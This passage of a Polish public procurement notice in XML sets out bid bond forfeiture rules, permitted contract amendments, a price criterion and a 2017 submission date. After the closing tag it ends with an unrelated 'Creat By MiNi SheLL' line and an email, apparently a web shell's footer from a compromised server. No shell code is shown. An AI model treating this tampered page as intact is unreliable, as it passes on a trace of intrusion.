za najkorzystniejszą, na wniosek tego Wykonawcy, zaliczane jest przez Zamawiającego na poczet zabezpieczenia należytego wykonania umowy.
13.11. 	Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku, gdy:
a)	odmówił podpisania umowy na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
13.12. 	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na  wezwanie, o którym mowa w art. 26 ust. 3 i 3a, z przyczyn leżących po jego stronie, nie złożył  oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1, oświadczenia, o którym mowa w art. 25a ust. 1, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa  w art. 87 ust. 2 pkt 3, co spowodowało brak możliwości  wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
</wadium><czy_wadium>T</czy_wadium><przewiduje_udzielenie_zaliczek></przewiduje_udzielenie_zaliczek><czy_przewiduje_udzielenie_zaliczek>N</czy_przewiduje_udzielenie_zaliczek><zlozenie_katalogow_elektronicznych_informacje_dodatkowe></zlozenie_katalogow_elektronicznych_informacje_dodatkowe><czy_dopuszcza_zlozenie_katalogow_elektronicznych>N</czy_dopuszcza_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_katalogow_elektronicznych>N</czy_wymaga_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_oferty_wariantowej>N</czy_wymaga_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej>N</czy_dopuszcza_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej>N</czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej><liczba_wyk></liczba_wyk><minimalna_liczba_wykonawcow></minimalna_liczba_wykonawcow><maksymalna_liczba_wykonawcow></maksymalna_liczba_wykonawcow><wybor_wyk></wybor_wyk><kod_trybu>PN</kod_trybu><z_kim_umowa_bedzie_zawarta /><czy_ograniczenie_liczby_uczestnikow /><ograniczenie_liczby_uczestnikow></ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow_informacje_dodatkowe></ograniczenie_liczby_uczestnikow_informacje_dodatkowe><czy_obejmuje_ustanowienie /><obejmuje_ustanowienie></obejmuje_ustanowienie><obejmuje_ustanowienie_informacje_dodatkowe></obejmuje_ustanowienie_informacje_dodatkowe><czy_pobranie_umowy_ramowej_dynamicznego_katalogow /><czy_umowy_ramowej_dynamicznego_katalogow /><czy_zmiana_umowy>T</czy_zmiana_umowy><zmiana_umowy>1.	Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane jedynie w formie pisemnej 
w postaci aneksu do umowy podpisanego przez obydwie strony, pod rygorem nieważności.
2.	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że zachodzi co najmniej jedna z następujących okoliczności: 
2.1.	Zmiany dopuszczone przez Zamawiającego w przypadku wystąpienia okoliczności wymienionych poniżej,                w zakresie: 
2.1.1.	zmiany terminu realizacji zadania w przypadku:
a)   konieczności zlecenia realizacji dodatkowych robót budowlanych;
b)    zmiany przepisów powodujących konieczność innych rozwiązań niż zakładano w opisie przedmiotu zamó-wie¬nia;
c)     zmiany przepisów powodujących konieczność uzyskania dokumentów, które te przepisy narzucają;
d)    gdy organy i instytucje uzgadniające nie wydały uzgodnień w ustawowym terminie, a w przypadku 
za¬rzą¬dzają¬cych mediami w terminie 2 miesięcy; 
e)    wystąpienia warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych, 
prze¬pro¬wadza¬nie prób i sprawdzeń, dokonywanie odbiorów, np. niedopuszczalne tempe¬ratury powietrza, wiatr uniemożliwiający pracę maszyn budowlanych, gwałtowne opady deszczu (obe¬rwanie chmury), gradobicie, burze z wyładowaniami atmosferycznymi, obfite opady śniegu, zalegający śnieg itd.;
f)     natrafienia przez Wykonawcę na urządzenia podziemne uprzednio niezinwentaryzowane 
uniemożli¬wia¬jące planowe wykonanie robót;
g)    innych przyczyn zewnętrznych niezależnych od Zamawiającego i Wykonawcy skutkujących 
niemożliwo¬ścią prowadzenia prac;
2.1.2.	zmian osobowych w przypadku:
a)    zmiany lub konieczności powołania nowych osób odpowiedzialnych za realizację umowy, o których mowa w § 4 umowy, pod warunkiem, że osoby te będą spełniały wymagania okre¬ślone w SIWZ;
b)    zmiany podwykonawcy, przy pomocy, którego Wykonawca wykonuje przedmiot umowy; zmiana jest moż-liwa tylko w przypadku, gdy nowy podwykonawca posiada tożsamą wiedzę i doświadczenie 
zawo¬dowe, poten¬cjał techniczny oraz osoby zdolne do wykonania zamówienia a także jest w sytuacji eko-nomiczniej i finansowej, jak dotychczasowy podwykonawca,
c)    rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy. Zmiana ta nie może dotyczyć czynności, które zgodnie z SIWZ muszą być wykonane przez Wykonawcę 
osobi¬ście. 
2.1.3.	zmiany wysokości wynagrodzenia i pozostałych zmian: 
a)    w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego (np.: powoduje skrócenie terminu realiza¬cji umowy, zmniejszenie wartości zamówienia);
b)    zmiana wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany:
b.1) stawki podatku od towarów i usług - wynagrodzenie netto Wykonawcy nie zmieni się, a określona 
w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów;
b.2)  wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy 
z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę - wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy wynikającą ze zwiększenia wynagrodzeń osób bezpośrednio wykonujących zamówienie do wysokości aktualnie obowiązującego minimalnego wynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia,
b.3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości składki na ubezpieczenia społeczne lub zdrowotne - wynagrodzenie Wykonawcy ulegnie zmianie, 
o wartość wzrostu całkowitego kosztu Wykonawcy, jaką będzie on zobowiązany dodatkowo ponieść 
w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie na rzecz Zamawiającego,
        - jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę;
c)    zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy, w tym zmiany pro¬cento-wej wysokości płatności faktury częściowej w przypadku przedłużenia terminu realizacji 
za¬mówienia nie wyni¬kającej z przyczyn leżących po stronie Wykonawcy oraz zmiany numeru rachunku bankowego Wykonawcy;
d)   wprowadzenia dodatkowych robót budowlanych;
e)    zmiana wartości zobowiązania przy rozliczeniu różnic obmiarowych, robót dodatkowych, robót 
za¬mien¬nych;
f)     przypadki losowe (np. kataklizmy, awarie urządzeń wywołane przez wyładowania atmosferyczne 
lub inne czynniki zewnętrzne i niemożliwe do przewidzenia wydarzenia), które będą miały wpływ 
na treść zawartej umowy i termin realizacji;
g)    obniżenie wynagrodzenia Wykonawcy, spowodowane rezygnacją przez Zamawiającego z realizacji 
cz꬜ci przed¬miotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie 
po¬mniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia i udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami.
h)    zmiany przepisów powodujących konieczność innych rozwiązań niż zakładano w opisie przedmiotu Zamó-wie¬nia;
2.2.	zmiany dotyczą realizacji dodatkowych dostaw, usług lub robót budowlanych od dotychczasowego Wykonawcy, nieobjętych zamówieniem podstawowym, o ile stały się niezbędne i zostały spełnione łącznie następujące warunki: 
a)	zmiana Wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, w szczególności dotyczących zamienności lub interoperacyjności sprzętu, usług lub instalacji, zamówionych w ramach zamówienia podstawowego, 
b)	zmiana Wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów 
dla Zamawiającego, 
c)	wartość każdej kolejnej zmiany nie przekracza 50% wartości zamówienia określonej pierwotnie 
w umowie; 
2.3.	zostały spełnione łącznie następujące warunki: 
a)	konieczność zmiany umowy spowodowana jest okolicznościami, których Zamawiający, działając 
z należytą starannością, nie mógł przewidzieć, 
b)	wartość zmiany nie przekracza 50% wartości zamówienia określonej pierwotnie w umowie; 
2.4.	Wykonawcę, któremu Zamawiający udzielił zamówienia, ma zastąpić nowy wykonawca: 
a)	na podstawie postanowień umownych, o których mowa w pkt  2.1., 
b)	w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy, 
c)	w wyniku przejęcia przez Zamawiającego zobowiązań Wykonawcy względem jego podwykonawców; 
2.5. zmiany, niezależnie od ich wartości, nie są istotne w rozumieniu ust. 2a.; 
2.6. łączna wartość zmian jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 i jest mniejsza od 10% wartości zamówienia określonej pierwotnie w umowie w przypadku zamówień 
na usługi lub dostawy albo, w przypadku zamówień na roboty budowlane – jest mniejsza od 15% wartości zamówienia określonej pierwotnie w umowie. 
2a. Zmianę postanowień zawartych w umowie uznaje się za istotną, jeżeli: 
1) zmienia ogólny charakter umowy, w stosunku do charakteru umowy w pierwotnym brzmieniu; 
2) nie zmienia ogólnego charakteru umowy i zachodzi co najmniej jedna z następujących okoliczności: 
a) zmiana wprowadza warunki, które, gdyby były postawione w postępowaniu o udzielenie zamówienia, 
to w tym postępowaniu wzięliby lub mogliby wziąć udział inni wykonawcy lub przyjęto by oferty innej treści, 
b) zmiana narusza równowagę ekonomiczną umowy na korzyść Wykonawcy w sposób nieprzewidziany pierwotnie w umowie, 
c) zmiana znacznie rozszerza lub zmniejsza zakres świadczeń i zobowiązań wynikający z umowy, 
d) polega na zastąpieniu Wykonawcy, któremu Zamawiający udzielił zamówienia, nowym wykonawcą, w przypadkach innych niż wymienione w ust. 2 pkt 2.4. 
3. Postanowienie umowne zmienione z naruszeniem ust. 2-2a podlega unieważnieniu. Na miejsce unieważnionych postanowień umowy wchodzą postanowienia umowne w pierwotnym brzmieniu. 
4. Jeżeli Zamawiający zamierza zmienić warunki realizacji zamówienia, które wykraczają poza zmiany umowy dopuszczalne zgodnie z ust. 2-2a obowiązany jest przeprowadzić nowe postępowanie o udzielenie zamówienia.
</zmiana_umowy><kryt_cena></kryt_cena><kryt_0>Cena</kryt_0><kryt_0p>70</kryt_0p><czy_aukcja /><aukcja_dod_info></aukcja_dod_info><elementy_aukcji_elektronicznej></elementy_aukcji_elektronicznej><ograniczenia_do_przedstawianych_wartosci></ograniczenia_do_przedstawianych_wartosci><informaje_udostepnione_wykonawcom></informaje_udostepnione_wykonawcom><informaje_przebiegu_aukcji></informaje_przebiegu_aukcji><warunki_do_licytacji></warunki_do_licytacji><wykorzystanie_sprzetu_elektronicznego></wykorzystanie_sprzetu_elektronicznego><spec_www></spec_www><spec_war></spec_war><potrzeb></potrzeb><wys_nagrod></wys_nagrod><harm_diag_kon></harm_diag_kon><pod_kon_etapy></pod_kon_etapy><data_skl>15/02/2017</data_skl><godz_skl>9:00</godz_skl><miejsce></miejsce><IV_4_4_jezyki>Polski</IV_4_4_jezyki><termin>
        on
      </termin><okres_liczba_dni>30</okres_liczba_dni><okres_data_do></okres_data_do><le_adres_aukcja></le_adres_aukcja><le_adres_opis></le_adres_opis><le_wymagania></le_wymagania><le_postapien></le_postapien><licytacja_etapy></licytacja_etapy><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nast /><licytacja_etapya></licytacja_etapya><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nasta /><warunki_zamkniecia_aukcji></warunki_zamkniecia_aukcji><zastosowanie_procedury_pzp>T</zastosowanie_procedury_pzp><IV_3_1_minimalne_wymagania></IV_3_1_minimalne_wymagania><IV_3_1_Przewidziane_jest_zastrzezenie /><IV_3_1_Przewidziany_podzial /><IV_3_1_etapy_negocjacji></IV_3_1_etapy_negocjacji><IV_3_1_dodatkowe_informacje></IV_3_1_dodatkowe_informacje><IV_3_2_opis_potrzeb></IV_3_2_opis_potrzeb><IV_3_2_informacja_wysokosc_nagrod></IV_3_2_informacja_wysokosc_nagrod><IV_3_2_wstepny_harmonogram></IV_3_2_wstepny_harmonogram><IV_3_2_PodzialDialogu /><IV_3_2_EtapyDialogu></IV_3_2_EtapyDialogu><IV_3_2_DodatkoweInformacje></IV_3_2_DodatkoweInformacje><IV_3_3_ElementyOpisu></IV_3_3_ElementyOpisu><IV_3_3_PodzialNegocjacji /><IV_3_3_DodatkoweInfo></IV_3_3_DodatkoweInfo><IV_IstotnePostanowienia></IV_IstotnePostanowienia><IV_LicytacjeDodatkoweInformacje></IV_LicytacjeDodatkoweInformacje><IV_6_1_sposob_udostepniania></IV_6_1_sposob_udostepniania><IV_6_1_srodki_ochrony></IV_6_1_srodki_ochrony><IV_6_2_SkrocenieTerminu>N</IV_6_2_SkrocenieTerminu><IV_6_2_Powody></IV_6_2_Powody><IV_6_6></IV_6_6><IV_6_5>N</IV_6_5><le_data_skl /><le_godz_skl /><le_miejsce_skl /><le_term_otw /><le_term_war_zam></le_term_war_zam><wym_zab_umowy></wym_zab_umowy><istotne_post></istotne_post><inf_dodat /><czy_uniewaznienie>T</czy_uniewaznienie><informacje_o_ustanowieniu_dds></informacje_o_ustanowieniu_dds><adres_poczty_internetowej_dds></adres_poczty_internetowej_dds><informacje_dotyczace_partnerstwa_innowacyjnego></informacje_dotyczace_partnerstwa_innowacyjnego><czesci><cz_0><nr_czesci></nr_czesci><nazwa></nazwa><opis></opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c></cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon></data_kon><kryt_cena></kryt_cena><kryt_1></kryt_1><kryt_1p></kryt_1p></cz_0></czesci></ZP-400>

Creat By MiNi SheLL
Email: jattceo@gmail.com